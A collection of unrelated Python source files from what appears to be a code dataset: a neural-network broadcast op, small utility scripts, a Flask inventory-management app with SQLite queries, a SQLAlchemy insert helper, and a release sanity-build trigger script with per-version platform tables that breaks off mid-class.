path('apiBoxDetail/', views.apiBoxDetailView, name='apiBoxDetail'),
#path('archive/', views.blog.archive),
] |
19,258 | 88939093d82356c81256c2fe5849091847e830bf | from __future__ import absolute_import
import numpy as np
from .Node import Op, NAME_RULE, PROFILING_MODE
from .. import profiler
from .._base import get_array_memory
class Conv2d_BroadcastToOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.profiler = None
if PROFILING_MODE == 1:
new_node.profiler = profiler.CreateProfiler()
if NAME_RULE == 0:
new_node.name = "Conv2d_BroadcastTo(%s,%s.shape)" % (
node_A.name, node_B.name)
elif NAME_RULE == 1:
new_node.name = "Conv2d_BroadcastTo"
else:
new_node.name = "Conv2d_BroadcastTo" + str(new_node.id)
new_node.desc = new_node.name + \
"(%s,%s.shape)" % (node_A.name, node_B.name)
return new_node
def profile(self, node, input_vals, output_val, is_static = True):
assert len(input_vals) == 2
if is_static:
# input memory
node.profiler.input_memory = get_array_memory(input_vals[0].shape) + \
get_array_memory(input_vals[1].shape)
# output memory
node.profiler.output_memory = get_array_memory(output_val.shape)
# no workspace
node.profiler.workspace_memory = 0
# execute time
node.profiler.time = node.profiler.output_memory / 4 * profiler.FLOPS_PER_SECOND
else:
import time
start = time.time()
from ..gpu_links import broadcast_to
broadcast_to(input_vals[0], output_val, None, node.profiler)
node.profiler.time = (time.time() - start) * 1000
def compute(self, node, input_vals, output_val, use_numpy=True, stream_handle=None):
assert(len(input_vals) == 2)
# print node.inputs[0].name, node.inputs[1].name
if use_numpy:
shapeW = input_vals[1].shape
shapeW = list(shapeW)
tmp = shapeW[1]
shapeW[1] = shapeW[3]
shapeW[3] = tmp
output_val[:] = np.broadcast_to(
input_vals[0], input_vals[1].shape).swapaxes(1, 3)
else:
from ..gpu_links import broadcast_to
broadcast_to(input_vals[0], output_val, stream_handle, None)
def gradient(self, node, output_grad):
from .Conv2dReduceSum import conv2d_reducesum_op
from .ZerosLike import zeroslike_op
grad_A = conv2d_reducesum_op(output_grad)
grad_B = zeroslike_op(node.inputs[1])
return [grad_A, grad_B]
def infer_shape(self, node, input_shapes):
"""TODO: Your code here"""
assert len(input_shapes) == 2
return input_shapes[1]
def conv2d_broadcastto_op(node_A, node_B):
"""Creates a node that represents np.broadcast_to(node_A, node_B.shape).
Parameters:
----
node_a : Node
The Node to be bcast.
node_b : Node
Another Node with the target shape.
Returns:
----
A new Node instance created by Op.
"""
return Conv2d_BroadcastToOp()(node_A, node_B)
|
19,259 | 92fdc4988fdf0344298b4027859a8969be285575 | import sys
import argparse
def argumentSetup():
parser = argparse.ArgumentParser(description='Determine if a string contains duplicates.')
parser.add_argument('string', type=str,
help='the input string')
return parser.parse_args()
def checkUniqueChars(string):
chars = [False]*128
for x, char in enumerate(string):
value = ord(char)
if chars[value] == True:
return False
else:
chars[value] = True
return True
def main():
args = argumentSetup()
if checkUniqueChars(args.string):
print ("PASS: String contains only unique characters")
else:
print("FAIL: String contains duplicate characters")
if __name__ == "__main__":
main() |
19,260 | 1814611996e31b4785d36fa856704694a7c37b2d | from test_cases import *
class Network(object):
"""Network checks to ensure an app could run correctly"""
logger = logging.getLogger(__name__)
@staticmethod
def check_local_internet():
Network.logger.debug(cons.DEBUG_CONNECTION_STAGE)
Network.logger.info(cons.INFO_CHECKING_LOCAL_WEB_AVAILABILITY)
response = UnixCommands.ping(cons.OUTER_SOURCE)
Inspection.is_pinging_local(response, Network)
@staticmethod
def check_host_availability():
Network.logger.info(cons.INFO_CHECKING_HOST_AVAILABILITY)
response = UnixCommands.ping(var.SERVER_IP)
Inspection.is_pinging_local(response, Network)
@staticmethod
def check_remote_internet():
Network.logger.info(cons.INFO_CHECKING_REMOTE_WEB_AVAILABILITY)
response = UnixCommands.remote_ping_web(var.SERVER_NAME, var.SERVER_IP, cons.PING_OUTER_SOURCE)
Inspection.is_pinging_remote(response, Network)
|
19,261 | 84388f3da351458f9b82e5c4c2157c2812fb1039 | #!/usr/bin/env python
"""
Example of using plt.axvline() to plot a a vertical line on a Matplotlib plot.
"""
import numpy as np
import matplotlib.pyplot as plt
values = np.random.randn(100)
plt.hist(values, label='values')
plt.axvline(values.mean(), color='red', linestyle='--', linewidth=4, label='mean')
plt.legend()
plt.show()
|
19,262 | 3b04122617936e3f1f4966d42c1dd92b2704e011 | from flask import (
Blueprint,
render_template,
request,
url_for,
g,
redirect,
session,
jsonify,
)
from invman.db import get_db
from invman.start import login_required
bp = Blueprint("main", __name__, url_prefix="/main")
def product_list(id):
""" Retrieves products which are in the product table. """
db = get_db()
product_list = db.execute(
"SELECT product_id, product_name, quantity FROM product WHERE for_business = ? AND quantity > 0",
(id,),
).fetchall()
return product_list
def get_product(location, product_id, quantity):
""" Used by the movement route to get a product from a location. """
product_array = []
db = get_db()
b_id = session.get("user_id")
if location == "product_factory":
# Get product from product table, deduct the quantity
ogquantity = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE product SET quantity = ? WHERE product_id = ? AND for_business = ?"
)
db.execute(query, (newquantity, product_id, b_id))
p = db.execute(
"SELECT product_id FROM product WHERE for_business = ? AND product_id = ?",
(b_id, product_id,),
).fetchone()
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
else:
ogquantity = db.execute(
"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE warehouse SET qty = ? where loc_id = ? AND prod_id = ? AND b_id = ?"
)
db.execute(query, (newquantity, location, product_id, b_id,))
p = db.execute(
"SELECT prod_id FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id,),
).fetchone()
if int(newquantity) == 0:
db.execute(
"DELETE FROM warehouse WHERE b_id = ? AND prod_id = ? AND loc_id = ?",
(b_id, product_id, location,),
)
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
def set_product(location, product_array):
""" Used by the movement route to set a product to a location. """
db = get_db()
b_id = session.get("user_id")
product_id = product_array[0]
quantity = product_array[1]
if location != "Move out":
product_exists = db.execute(
"SELECT * FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id),
).fetchone()
if product_exists:
ogquantity = db.execute(
"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity + quantity
query = "UPDATE warehouse SET qty = ? WHERE loc_id = ? AND prod_id = ? AND b_id = ?"
db.execute(query, (newquantity, location, product_id, b_id,))
db.commit()
else:
db.execute(
"INSERT INTO warehouse (b_id, prod_id, qty, loc_id) values (?, ?, ?, ?)",
(b_id, product_id, quantity, location),
)
db.commit()
def balance_quantity(quantity, product_id, location):
""" Used by the product route to add or subtract quantity of a product."""
db = get_db()
if location == "product_factory":
ogquantity = db.execute(
"SELECT quantity from product WHERE product_id = ?", (product_id,)
).fetchone()
ogquantity = ogquantity["quantity"]
newquantity = ogquantity + quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = "UPDATE product SET quantity = ? where product_id = ?"
db.execute(query, (newquantity, product_id))
db.commit()
@bp.route("/<id>/delete", methods=("GET",))
def delete(id):
""" Used by the product page to delete a product. Doesn't actually delete it, just sets the quantity to 0. """
db = get_db()
b_id = session.get("user_id")
query = "UPDATE product SET quantity = 0 WHERE product_id = ? AND for_business = ?"
db.execute(query, (id, b_id,))
db.commit()
return redirect(url_for("main.products"))
@bp.route("/")
def root():
return redirect(url_for("main.products"))
@bp.route("/products", methods=("GET", "POST"))
@login_required
def products():
""" The product route. """
db = get_db() # Get the database connection.
b_id = session.get("user_id")
error = None
# Request to add/update a product to the product table.
if request.method == "POST":
if "submit_product" in request.form:
try:
prod_id = request.form["insert_product_id"]
prod_name = request.form["insert_product_name"]
prod_qty = int(request.form["insert_product_qty"])
if prod_qty < 0:
raise Exception("Invalid quantity.")
db.execute(
"INSERT INTO product (product_id, product_name, quantity, for_business) values (?, ?, ?, ?)",
(prod_id, prod_name, prod_qty, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed" in str(e):
error = "Error adding product: A product with that ID already exists or has been created before."
elif "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
if "update_product" in request.form:
try:
prod_selected = request.form["select_product"].split(",")[0]
prod_name = request.form["update_product_name"]
prod_qty = int(request.form["update_product_qty"])
if prod_name:
query = "UPDATE product SET product_name = ? WHERE product_id = ?"
db.execute(query, (prod_name, prod_selected))
db.commit()
balance_quantity(
prod_qty, prod_selected, location="product_factory",
)
db.commit()
except Exception as e:
if "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
else:
pass
# Retrieve and display products on the page.
prod_list = product_list(b_id)
return render_template(
"products.html", products=prod_list, title="Products", error=error
)
@bp.route("/<lid>/deleteloc", methods=("GET",))
def delete_loc(lid):
""" Used by the location page to delete a location. Also deletes any products at that location. """
db = get_db()
b_id = session.get("user_id")
db.execute(
"DELETE FROM location WHERE location_id = ? AND for_business = ?", (lid, b_id,)
)
db.commit()
db.execute("DELETE FROM warehouse WHERE loc_id = ? AND b_id = ?", (lid, b_id,))
db.commit()
return redirect(url_for("main.locations"))
@bp.route("/locations", methods=("GET", "POST"))
@login_required
def locations():
""" The location route. """
db = get_db() # Get the database connection
b_id = session.get("user_id")
error = None
# Request to add a location to the location table.
if request.method == "POST":
if "submit_location" in request.form:
try:
loc_id = request.form["insert_location_id"]
loc_name = request.form["insert_location_name"]
db.execute(
"INSERT INTO location (location_id, location_name, for_business) values(?, ?, ?)",
(loc_id, loc_name, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed:" in str(e):
error = "Location with that ID already exists."
else:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
if "update_location" in request.form:
try:
loc_selected = request.form["select-location"].split(",")[0]
new_locname = request.form["location-name-update"]
db.execute(
"UPDATE location SET location_name = ? WHERE location_id = ?",
(new_locname, loc_selected,),
)
db.commit()
except Exception as e:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
else:
pass
# Retrieve locations and render the page.
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html", title="Locations", locations=location_list, error=error
)
def check_warehouse():
""" Returns a list of location IDs which has products stored """
db = get_db()
b_id = session.get("user_id")
query = "SELECT loc_id FROM warehouse where b_id = ?"
warehouses = db.execute(query, (b_id,)).fetchall()
loc_list = []
for lids in warehouses:
if lids[0] not in loc_list:
loc_list.append(lids[0])
return loc_list
@bp.route("/_loadproducts/<lid>", methods=("GET",))
def loadproducts(lid):
""" Used by the movement page to retrieve products at a particular location. """
db = get_db()
b_id = session.get("user_id")
product_list = {}
if lid == "Products":
query = "SELECT product_id, product_name FROM product WHERE for_business = ? AND quantity > 0"
warehouses = db.execute(query, (b_id,)).fetchall()
for products in warehouses:
product_list[products[0]] = products[1]
else:
query = "SELECT prod_id FROM warehouse where loc_id = ? AND b_id = ?"
warehouses = db.execute(query, (lid, b_id,)).fetchall()
for products in warehouses:
product_name = db.execute(
"SELECT product_name FROM product WHERE product_id = ? AND for_business = ?",
(products["prod_id"], b_id,),
).fetchone()
product_list[products["prod_id"]] = product_name["product_name"]
return jsonify(product_list)
@bp.route("/_getquantity/<prd>/<loc>", methods=("GET",))
def getquantity(prd, loc):
""" Used by the movement page to get the quantity of a product."""
db = get_db()
b_id = session.get("user_id")
qty = {}
if loc == "Products":
if prd != "None":
q = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(prd, b_id,),
).fetchone()
qty["qty"] = str(q["quantity"])
else:
pass
else:
q = db.execute(
"SELECT qty FROM warehouse WHERE prod_id = ? AND b_id = ? AND loc_id = ?",
(prd, b_id, loc,),
).fetchone()
qty["qty"] = str(q["qty"])
return qty
def products_at_locations():
""" Creates a dictionary with loc IDs as keys and products stored there as values """
db = get_db()
b_id = session.get("user_id")
locs = check_warehouse()
warehouse = {}
for ids in locs:
l = []
prods = db.execute(
"SELECT prod_id, qty FROM warehouse where b_id = ? AND loc_id = ?",
(b_id, ids,),
).fetchall()
locname = db.execute(
"SELECT location_name FROM location WHERE location_id = ? AND for_business = ?",
(ids, b_id,),
).fetchone()["location_name"]
for data in prods:
prodname = db.execute(
"SELECT product_name FROM product WHERE for_business = ? AND product_id = ?",
(b_id, data["prod_id"],),
).fetchone()["product_name"]
l.append([data["prod_id"] + " " + prodname, data["qty"]])
warehouse[locname] = l
return warehouse
def logmovements(
movement_id, from_location, to_location, prod_id, qty,
):
db = get_db()
b_id = session.get("user_id")
if from_location == "Products":
from_location = "Products"
if to_location == "Move out":
to_location = "MO"
db.execute(
"INSERT INTO movement (movement_id, from_location, to_location, prod_id, qty, b_id)"
"VALUES (?, ?, ?, ?, ?, ?)",
(movement_id, from_location, to_location, prod_id, qty, b_id,),
)
db.commit()
@bp.route("/movement", methods=("GET", "POST",))
@login_required
def movements():
""" Movement route. """
db = get_db()
b_id = session.get("user_id")
error = None
if request.method == "POST":
# movement request - move product to a location
try:
move_from = request.form["select-location"].split(",")[0]
product_id = request.form["choose-product"].split(",")[0]
quantity = int(request.form["quantity"])
move_to = request.form["move-to"].split(",")[0]
if quantity < 0:
raise Exception("Invalid quantity.")
if move_from == "Products":
moveid = "P-"
product_array = get_product("product_factory", product_id, quantity)
else:
moveid = move_from + "-"
product_array = get_product(move_from, product_id, quantity)
set_product(move_to, product_array)
if move_to == "Move out":
moveid += "MO"
else:
moveid += move_to
logmovements(moveid, move_from, move_to, product_id, quantity)
prod_list = product_list(b_id)
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
warehouses = check_warehouse()
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
except Exception as e:
if "'NoneType' object is not subscriptable" in str(e):
error = "Error moving: Invalid product."
else:
error = "Error moving: " + str(e)
# Retrieve products from the products table
prod_list = product_list(b_id)
# Retrieve all locations
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
# Get all locations which have products stored.
warehouses = check_warehouse()
# Creates a list of those locations along with their names.
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
@bp.route("/movementlogs", methods=("GET", "POST",))
@login_required
def movementlogs():
""" Movement logs route. """
db = get_db()
b_id = session.get("user_id")
logtable = db.execute("SELECT * FROM movement WHERE b_id = ?", (b_id,)).fetchall()
business_name = db.execute(
"SELECT business_name FROM business WHERE business_id = ?", (b_id,)
).fetchone()
return render_template(
"movementlogs.html",
logtable=logtable,
business_name=business_name,
title="Logs",
)
@bp.route("/logout")
def logout():
session.clear()
return redirect(url_for("start.index"))
|
19,263 | ff002c4f0044a78a5dcc1f0684bfdff0adff889b | from sqlalchemy.orm import sessionmaker
from db_interface.get_metadata import Metadata
from sqlalchemy import exc
from exceptions.insert_error import InsertError
class InsertData:
def __init__(self, database, table, data, orm_class, test_env):
engine = Metadata(test_env=test_env, table_name=table)
engine.make_engine()
self.session = sessionmaker(bind=engine.engine)
self.data = data
self.orm_class = orm_class
def insert(self):
session = self.session()
orm = self.orm_class()
for i in self.data.keys():
orm.__dict__[i] = self.data[i]
try:
print("Insert ORM: {}".format(type(orm)))
session.add(orm)
session.commit()
return "Data inserted"
except Exception as error:
session.rollback()
raise InsertError(error)
|
19,264 | 5d721c9e70556c404c9c46d70c7a2bb6b0dad7f9 | from jigsaw import JigsawPlugin
class Plugin(JigsawPlugin):
pass
|
19,265 | 3a3e2fb902d7f5c7799868569b4fe184a1807f21 | #!/usr/bin/env python3
import argparse
import glob
import json
import os
# Output: .properties file for triggering build_sanity_matrix
# (if .properties file is absent, no need to trigger)
# Properties:
# CURRENT_BUILD_NUMBER (the build number for which to run sanity)
# VERSION
# DISTROS - whitespace-separated list of platforms (debian8, ubuntu14.04...)
# TESTRUNNER_BRANCH - branch of testrunner to use
# QQQ The set of platforms for a given release should come from a
# canonical location, such as the product-metadata repository.
# For now we keep the version-specific platform lists here.
# For now these 'platform' keys are the letters in the installer filenames.
# The boolean value is whether that platform is passed on to
# build_sanity_matrix (ie, put into the .properties file).
VERSION_DATA = {
"4.6.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": True,
"debian8": True,
"macos": False,
"suse11": True,
"ubuntu12": True,
"ubuntu14": False,
"windows": True,
},
"testrunner_branch": "watson",
},
"5.0.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": False,
"debian8": True,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": False,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.5.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.4": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.6": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.7": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.8": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.9": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"6.0.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.4": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.6": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.7": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.5.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.5.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.5.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.6.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.3": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.4": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.5": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"7.0.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.3": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.4": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.1.0": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.1": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.2": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.3": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.4": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.5": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.0": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.1": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.2": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.5.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"7.6.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"8.0.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"0.0.0": {
"platforms": {
"amzn2": False,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
}
LAST_SANITY_FILENAME="/latestbuilds/last-sanity.json"
TRIGGER_PROPERTIES_FILENAME="build-sanity-trigger.properties"
class SanityTrigger:
"""
For a given version, looks for the most recent build that is
complete (all installers exist).
"""
def __init__(self, product, version):
self.use_magma = False
if "MAGMA" in version:
self.use_magma = True
